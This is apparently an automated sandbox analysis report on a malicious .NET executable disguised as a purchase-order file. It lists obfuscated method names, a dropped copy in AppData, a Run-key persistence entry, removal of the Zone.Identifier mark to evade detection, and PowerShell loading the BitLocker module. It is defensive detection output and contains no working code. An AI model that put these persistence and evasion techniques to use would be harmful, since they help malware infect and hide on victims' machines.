                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, GegNK9MHS8xGZZ61Gq.csHigh entropy of concatenated method names: 'kWGuguBDgY', 'huhuVNamJx', 'XOrusphPae', 'w6hua4AgZ5', 'N77udRjM1D', 'eMFuh8Z9fX', 'nPtuWgXHxv', 'd9yu4h9gyP', 'NjeuCmVbDu', 'fI6uFlaZrv'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, HlWFR4vQIClmUuPwY7.csHigh entropy of concatenated method names: 'nQgu3YJbAG', 'ntOuTAOTC4', 'Ak3uxgwSAS', 'A1Ou2BY03v', 'bRAuZRAR74', 'CyJu5eqYS6', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, h3P7Jmyj3XGBVnMunY.csHigh entropy of concatenated method names: 'igxseC1owB', 'WAXsAy6MTE', 'soEsQkVl8N', 'wglsy1glLR', 'qras8mmijv', 'SwwsbOIPRp', 'cNNs0CBVSE', 'zBnsuJb09q', 'lWNspmlQoL', 'okXsl8Eq3g'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, DYw0y6Y5vgvWOsT0qF.csHigh entropy of concatenated method names: 'tw2pRx2WQc', 'L8ep9MhVA7', 'erOpONh5C8', 'VoypgHUjIb', 'lGnpVxUjxV', 'qOopaSbVc4', 'gP1pdNgrZt', 'uUPuN7DRJD', 'hWDuMa22df', 'Bk7uvlnI8M'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, WVm6LK3lT2Kovi1yt2.csHigh entropy of concatenated method names: 'dcSdwbch6Q', 'MDKdVqYZNg', 'B6Mda156LL', 'DrVdhNfUhA', 'zLIdWkcrNR', 'cDNaEV4frQ', 'Em8acfCQuE', 'CQsaNx0NW9', 'n82aMKslpq', 'z0davmHWwt'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, NLLDLSGhLjNiFkvCP0.csHigh entropy of concatenated method names: 'ohim4SiNf', 'yDfeQDXi5', 'LRbAkQhbT', 'TjUreekdi', 'YKWyi1IIo', 'VfEqMj2QX', 'OSsHD3nslixDjt4Okx', 'oqgl2u5u2Q8HHcf1gL', 'sseuH24sx', 'DZHlU0Iw4'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, tDsfXfqDOSPinCLHbV.csHigh entropy of concatenated method names: 'drHa68Lcip', 'K9Uar3Cdav', 'jFesxwAMSk', 'nf5s2sLWmo', 'eBas5DdtGn', 'L6HsLVFUHS', 'qRosDHpNqN', 'DOqstLRrQA', 'uX0sHZAHgR', 'nWUskNv4uR'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, crOaocRUBdtAijCEKeb.csHigh entropy of concatenated method names: 'QLQpo3LPbe', 'zFMpJta6cw', 'MrJpm997QA', 'pr6peq8ouu', 'INIp6suju5', 'WEQpAoXnhG', 'as0prjAck0', 'Fi8pQwkSrf', 'YPApyiIRx5', 'f61pqpOr6O'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, qgQCdRR9ohCEh5iiW3H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YwalZYxXVx', 'UODl1fLEsh', 'gPkljwfuZx', 'YSTln2QoF6', 'bQOlEZuja2', 'tlAlcaX1AU', 'I9vlNl4Zfx'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.5f60000.7.raw.unpack, TDUwymQgqk3Z3KoOJH.csHigh entropy of concatenated method names: 'vB6VZSDOtq', 'q2HV1bC4mb', 'v6qVjw1814', 'gMpVnxu4SV', 'Wf3VEYsm21', 'DH6Vc6pHOL', 'TcOVNJ01Jt', 'CCMVM8f4yS', 'Ee0Vvf0TSZ', 'GlnVYMLPcq'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, Ce2Xf9cjqybYAM3F2w.csHigh entropy of concatenated method names: 'OjS0MRIe08', 'ttH0YsScod', 'aqiuUA1i5l', 'YFQuRkh1l5', 'uHn0PU2yyA', 'fo907Zl2Ch', 'uQO0IVvKe2', 'yIK0Zytajp', 'E2C01vicDf', 'jDF0je48LY'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, leE21PHPPCCd9mfVUy.csHigh entropy of concatenated method names: 'pEthoifBFx', 'sgXhJlw68X', 'zT5hmpto2m', 'pCHheEorQP', 'yoKh6snU5M', 'pTYhAZPDUN', 'TRehrgVr8U', 'HRVhQRickV', 'X7Khyey2lT', 'RymhqLIjqC'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, aVADjOVDuEeZsiv9gr.csHigh entropy of concatenated method names: 'Dispose', 'T0cRvXBjHO', 'tE2GTBWM8r', 'SnokkHLy9R', 'T3eRYgNK9H', 'o8xRzGZZ61', 'ProcessDialogKey', 'cqxGUlWFR4', 'DICGRlmUuP', 'eY7GGQYw0y'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, YUIl37IKJYjF8xf27m.csHigh entropy of concatenated method names: 'PrHSQ58NC9', 'sLbSyDDd8p', 'E40S3v1ljY', 'yUYST3SQQj', 'TdwS2EZxKB', 'SfgS5t8InR', 'QgBSDX1mmL', 'NBISt5RnnG', 'JOBSkfLgMj', 'MJOSPv6wpZ'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, mxKMTujwPb7MXUpb3w.csHigh entropy of concatenated method names: 'ToString', 'fKFbPyGtta', 'h7RbTh78XW', 'LyvbxMaHEJ', 'iRgb2jIQiw', 'RN0b5yw0vo', 'FgQbLyBR0F', 'vfpbDwhD2h', 'QrpbtrhXIX', 'Gx4bHY13n0'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, yF83lkDx7U66ctmbMp.csHigh entropy of concatenated method names: 'cU5hgAWSSD', 'b0qhs4Pw9C', 'RdHhdxx3f9', 'KhadYs86ur', 'cQBdzACA4A', 'ufghUHkIDX', 'u6QhRc3o2T', 'uSXhGaEWil', 'm83h93JvPN', 'TSUhO0rFwV'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, WTWIs8ORlK2dCEydd1.csHigh entropy of concatenated method names: 'LPnRhDUwym', 'fqkRW3Z3Ko', 'zj3RCXGBVn', 'XunRFYXDsf', 'mLHR8bVNVm', 'BLKRblT2Ko', 'XmvMrBugM0j0x7ytfa', 'UGTTKZRRCXOxxEfvvN', 'wX5RRU8Vug', 'YjaR97xsuS'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, zntx6TZ7Lbd4cPomW6.csHigh entropy of concatenated method names: 'ww68kQl4sH', 'hHR87JCUHr', 'RZs8ZSxi7D', 'FOE81BNJ40', 'taH8TXE3ZA', 'JtC8xUFp58', 'n9Q82stkSW', 'lcK85g9nWD', 'OR28LiVxJj', 'ONI8DL16Nc'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, utfVXMWZH8mR5jCuu6.csHigh entropy of concatenated method names: 'dtl9wSHLsw', 'Msc9gKMPU9', 'UyM9VPDDrp', 'ubc9sh973I', 'Cok9aj6bHX', 'sP19dPsj76', 'IEK9hniY3a', 'T1U9WDAWg1', 'UxN94iuI4B', 'C0t9C6dfM3'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, Kq767ssRxj1nqny8Z0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S64Gv2f46X', 'NH6GYDRc6V', 'gBZGz4ylCp', 'Aq49Uon7YW', 'cJf9RE5Ufe', 'XEu9GaH0Ck', 'Cbp99IyNrh', 'dKNwTsGoQJkwn9ixCIT'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, GegNK9MHS8xGZZ61Gq.csHigh entropy of concatenated method names: 'kWGuguBDgY', 'huhuVNamJx', 'XOrusphPae', 'w6hua4AgZ5', 'N77udRjM1D', 'eMFuh8Z9fX', 'nPtuWgXHxv', 'd9yu4h9gyP', 'NjeuCmVbDu', 'fI6uFlaZrv'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, HlWFR4vQIClmUuPwY7.csHigh entropy of concatenated method names: 'nQgu3YJbAG', 'ntOuTAOTC4', 'Ak3uxgwSAS', 'A1Ou2BY03v', 'bRAuZRAR74', 'CyJu5eqYS6', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, h3P7Jmyj3XGBVnMunY.csHigh entropy of concatenated method names: 'igxseC1owB', 'WAXsAy6MTE', 'soEsQkVl8N', 'wglsy1glLR', 'qras8mmijv', 'SwwsbOIPRp', 'cNNs0CBVSE', 'zBnsuJb09q', 'lWNspmlQoL', 'okXsl8Eq3g'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, DYw0y6Y5vgvWOsT0qF.csHigh entropy of concatenated method names: 'tw2pRx2WQc', 'L8ep9MhVA7', 'erOpONh5C8', 'VoypgHUjIb', 'lGnpVxUjxV', 'qOopaSbVc4', 'gP1pdNgrZt', 'uUPuN7DRJD', 'hWDuMa22df', 'Bk7uvlnI8M'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, WVm6LK3lT2Kovi1yt2.csHigh entropy of concatenated method names: 'dcSdwbch6Q', 'MDKdVqYZNg', 'B6Mda156LL', 'DrVdhNfUhA', 'zLIdWkcrNR', 'cDNaEV4frQ', 'Em8acfCQuE', 'CQsaNx0NW9', 'n82aMKslpq', 'z0davmHWwt'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, NLLDLSGhLjNiFkvCP0.csHigh entropy of concatenated method names: 'ohim4SiNf', 'yDfeQDXi5', 'LRbAkQhbT', 'TjUreekdi', 'YKWyi1IIo', 'VfEqMj2QX', 'OSsHD3nslixDjt4Okx', 'oqgl2u5u2Q8HHcf1gL', 'sseuH24sx', 'DZHlU0Iw4'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, tDsfXfqDOSPinCLHbV.csHigh entropy of concatenated method names: 'drHa68Lcip', 'K9Uar3Cdav', 'jFesxwAMSk', 'nf5s2sLWmo', 'eBas5DdtGn', 'L6HsLVFUHS', 'qRosDHpNqN', 'DOqstLRrQA', 'uX0sHZAHgR', 'nWUskNv4uR'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, crOaocRUBdtAijCEKeb.csHigh entropy of concatenated method names: 'QLQpo3LPbe', 'zFMpJta6cw', 'MrJpm997QA', 'pr6peq8ouu', 'INIp6suju5', 'WEQpAoXnhG', 'as0prjAck0', 'Fi8pQwkSrf', 'YPApyiIRx5', 'f61pqpOr6O'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, qgQCdRR9ohCEh5iiW3H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YwalZYxXVx', 'UODl1fLEsh', 'gPkljwfuZx', 'YSTln2QoF6', 'bQOlEZuja2', 'tlAlcaX1AU', 'I9vlNl4Zfx'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42d77f8.3.raw.unpack, TDUwymQgqk3Z3KoOJH.csHigh entropy of concatenated method names: 'vB6VZSDOtq', 'q2HV1bC4mb', 'v6qVjw1814', 'gMpVnxu4SV', 'Wf3VEYsm21', 'DH6Vc6pHOL', 'TcOVNJ01Jt', 'CCMVM8f4yS', 'Ee0Vvf0TSZ', 'GlnVYMLPcq'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, Ce2Xf9cjqybYAM3F2w.csHigh entropy of concatenated method names: 'OjS0MRIe08', 'ttH0YsScod', 'aqiuUA1i5l', 'YFQuRkh1l5', 'uHn0PU2yyA', 'fo907Zl2Ch', 'uQO0IVvKe2', 'yIK0Zytajp', 'E2C01vicDf', 'jDF0je48LY'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, leE21PHPPCCd9mfVUy.csHigh entropy of concatenated method names: 'pEthoifBFx', 'sgXhJlw68X', 'zT5hmpto2m', 'pCHheEorQP', 'yoKh6snU5M', 'pTYhAZPDUN', 'TRehrgVr8U', 'HRVhQRickV', 'X7Khyey2lT', 'RymhqLIjqC'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, aVADjOVDuEeZsiv9gr.csHigh entropy of concatenated method names: 'Dispose', 'T0cRvXBjHO', 'tE2GTBWM8r', 'SnokkHLy9R', 'T3eRYgNK9H', 'o8xRzGZZ61', 'ProcessDialogKey', 'cqxGUlWFR4', 'DICGRlmUuP', 'eY7GGQYw0y'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, YUIl37IKJYjF8xf27m.csHigh entropy of concatenated method names: 'PrHSQ58NC9', 'sLbSyDDd8p', 'E40S3v1ljY', 'yUYST3SQQj', 'TdwS2EZxKB', 'SfgS5t8InR', 'QgBSDX1mmL', 'NBISt5RnnG', 'JOBSkfLgMj', 'MJOSPv6wpZ'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, mxKMTujwPb7MXUpb3w.csHigh entropy of concatenated method names: 'ToString', 'fKFbPyGtta', 'h7RbTh78XW', 'LyvbxMaHEJ', 'iRgb2jIQiw', 'RN0b5yw0vo', 'FgQbLyBR0F', 'vfpbDwhD2h', 'QrpbtrhXIX', 'Gx4bHY13n0'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, yF83lkDx7U66ctmbMp.csHigh entropy of concatenated method names: 'cU5hgAWSSD', 'b0qhs4Pw9C', 'RdHhdxx3f9', 'KhadYs86ur', 'cQBdzACA4A', 'ufghUHkIDX', 'u6QhRc3o2T', 'uSXhGaEWil', 'm83h93JvPN', 'TSUhO0rFwV'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, WTWIs8ORlK2dCEydd1.csHigh entropy of concatenated method names: 'LPnRhDUwym', 'fqkRW3Z3Ko', 'zj3RCXGBVn', 'XunRFYXDsf', 'mLHR8bVNVm', 'BLKRblT2Ko', 'XmvMrBugM0j0x7ytfa', 'UGTTKZRRCXOxxEfvvN', 'wX5RRU8Vug', 'YjaR97xsuS'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, zntx6TZ7Lbd4cPomW6.csHigh entropy of concatenated method names: 'ww68kQl4sH', 'hHR87JCUHr', 'RZs8ZSxi7D', 'FOE81BNJ40', 'taH8TXE3ZA', 'JtC8xUFp58', 'n9Q82stkSW', 'lcK85g9nWD', 'OR28LiVxJj', 'ONI8DL16Nc'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, utfVXMWZH8mR5jCuu6.csHigh entropy of concatenated method names: 'dtl9wSHLsw', 'Msc9gKMPU9', 'UyM9VPDDrp', 'ubc9sh973I', 'Cok9aj6bHX', 'sP19dPsj76', 'IEK9hniY3a', 'T1U9WDAWg1', 'UxN94iuI4B', 'C0t9C6dfM3'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, Kq767ssRxj1nqny8Z0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'S64Gv2f46X', 'NH6GYDRc6V', 'gBZGz4ylCp', 'Aq49Uon7YW', 'cJf9RE5Ufe', 'XEu9GaH0Ck', 'Cbp99IyNrh', 'dKNwTsGoQJkwn9ixCIT'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, GegNK9MHS8xGZZ61Gq.csHigh entropy of concatenated method names: 'kWGuguBDgY', 'huhuVNamJx', 'XOrusphPae', 'w6hua4AgZ5', 'N77udRjM1D', 'eMFuh8Z9fX', 'nPtuWgXHxv', 'd9yu4h9gyP', 'NjeuCmVbDu', 'fI6uFlaZrv'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, HlWFR4vQIClmUuPwY7.csHigh entropy of concatenated method names: 'nQgu3YJbAG', 'ntOuTAOTC4', 'Ak3uxgwSAS', 'A1Ou2BY03v', 'bRAuZRAR74', 'CyJu5eqYS6', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, h3P7Jmyj3XGBVnMunY.csHigh entropy of concatenated method names: 'igxseC1owB', 'WAXsAy6MTE', 'soEsQkVl8N', 'wglsy1glLR', 'qras8mmijv', 'SwwsbOIPRp', 'cNNs0CBVSE', 'zBnsuJb09q', 'lWNspmlQoL', 'okXsl8Eq3g'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, DYw0y6Y5vgvWOsT0qF.csHigh entropy of concatenated method names: 'tw2pRx2WQc', 'L8ep9MhVA7', 'erOpONh5C8', 'VoypgHUjIb', 'lGnpVxUjxV', 'qOopaSbVc4', 'gP1pdNgrZt', 'uUPuN7DRJD', 'hWDuMa22df', 'Bk7uvlnI8M'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, WVm6LK3lT2Kovi1yt2.csHigh entropy of concatenated method names: 'dcSdwbch6Q', 'MDKdVqYZNg', 'B6Mda156LL', 'DrVdhNfUhA', 'zLIdWkcrNR', 'cDNaEV4frQ', 'Em8acfCQuE', 'CQsaNx0NW9', 'n82aMKslpq', 'z0davmHWwt'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, NLLDLSGhLjNiFkvCP0.csHigh entropy of concatenated method names: 'ohim4SiNf', 'yDfeQDXi5', 'LRbAkQhbT', 'TjUreekdi', 'YKWyi1IIo', 'VfEqMj2QX', 'OSsHD3nslixDjt4Okx', 'oqgl2u5u2Q8HHcf1gL', 'sseuH24sx', 'DZHlU0Iw4'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, tDsfXfqDOSPinCLHbV.csHigh entropy of concatenated method names: 'drHa68Lcip', 'K9Uar3Cdav', 'jFesxwAMSk', 'nf5s2sLWmo', 'eBas5DdtGn', 'L6HsLVFUHS', 'qRosDHpNqN', 'DOqstLRrQA', 'uX0sHZAHgR', 'nWUskNv4uR'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, crOaocRUBdtAijCEKeb.csHigh entropy of concatenated method names: 'QLQpo3LPbe', 'zFMpJta6cw', 'MrJpm997QA', 'pr6peq8ouu', 'INIp6suju5', 'WEQpAoXnhG', 'as0prjAck0', 'Fi8pQwkSrf', 'YPApyiIRx5', 'f61pqpOr6O'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, qgQCdRR9ohCEh5iiW3H.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YwalZYxXVx', 'UODl1fLEsh', 'gPkljwfuZx', 'YSTln2QoF6', 'bQOlEZuja2', 'tlAlcaX1AU', 'I9vlNl4Zfx'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.42109d8.4.raw.unpack, TDUwymQgqk3Z3KoOJH.csHigh entropy of concatenated method names: 'vB6VZSDOtq', 'q2HV1bC4mb', 'v6qVjw1814', 'gMpVnxu4SV', 'Wf3VEYsm21', 'DH6Vc6pHOL', 'TcOVNJ01Jt', 'CCMVM8f4yS', 'Ee0Vvf0TSZ', 'GlnVYMLPcq'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack, JwlrlmCCKvmG8rWaC9.csHigh entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
                      Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.raw.unpack, JwlrlmCCKvmG8rWaC9.csHigh entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exe
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exe
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exe
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exeJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exeJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: \pr 2500006515 #u2116 972 #u043e#u0442 eta 24 hidmaksan vietnam ind co.,ltd 2024.exeJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to dropped file
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeFile opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
